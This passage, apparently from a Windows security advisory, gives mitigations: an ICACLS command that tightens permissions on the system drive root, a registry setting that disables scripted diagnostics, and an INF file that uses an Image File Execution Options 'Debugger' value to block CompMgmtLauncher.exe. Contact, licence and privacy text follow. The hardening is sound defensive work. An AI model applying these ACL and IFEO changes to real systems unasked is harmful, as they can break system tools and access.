Finally remove the permission for unprivileged users (really: members of the NT AUTHORITY\Authenticated Users or BUILTIN\Users groups) to create subdirectories in the root directory of the system drive:

ICACLs.exe %SystemDrive%\ /Deny *S-1-5-32-545:(AD,WD) /Remove:d *S-1-5-32-545 /Remove:g *S-1-5-11

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics]
"EnableDiagnostics"=dword:00000000

Alternative mitigation

; Copyright © 2016-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = AddReg

[AddReg]
HKLM,"SOFTWARE\Microsoft\Windows NT\Image File Execution Options\CompMgmtLauncher.exe","Debugger",0,"%16420%\.exe"

Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures as well as EventVwr.exe is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Installation

Note: on Windows Vista and newer versions of Windows NT, InfDefaultInstall.exe, the application registered for the Install verb of *.inf files, requests administrative privileges.

Note: on systems with AMD64 alias x64 processor architecture, the installation must be run in the native (64-bit) execution environment!

Update

Deinstallation

Trivia

Contact and Feedback

Use the X.509 certificate to send S/MIME encrypted mail.

Note: email in weird format and without a proper sender name is likely to be discarded!

I dislike HTML (and even weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your nickname.
I abhor top posts and expect inline quotes in replies.

Terms and Conditions

• The software and the documentation on this site are provided as is without any warranty, neither express nor implied.
  In no event will the author be held liable for any damage(s) arising from the use of the software or the documentation.
• Permission is granted to use the current version of the software and the current version of the documentation solely for personal private and non-commercial purposes.
  An individuals use of the software or the documentation in his or her capacity or function as an agent, (independent) contractor, employee, member or officer of a business, corporation or organisation (commercial or non-commercial) does not qualify as personal private and non-commercial purpose.
• Without written approval from the author the software or the documentation must not be used for a business, for commercial, corporate, governmental, military or organisational purposes of any kind, or in a commercial, corporate, governmental, military or organisational environment of any kind.
• Redistribution of the software and the documentation is allowed only in unmodified form of its current version and free of charge.

Data Protection Declaration

The web service is operated and provided by

The web service provider stores a session cookie in the web browser and records every visit of this web site with the following data in an access log on their server(s):

• the (pseudonymised) IP address;
• the date and time of the request;
• the URL of the requested web page or file;
• the Referer and User-Agent HTTP headers sent by the web browser;
• the result (success or failure) of the request;
• the amount of data received and sent.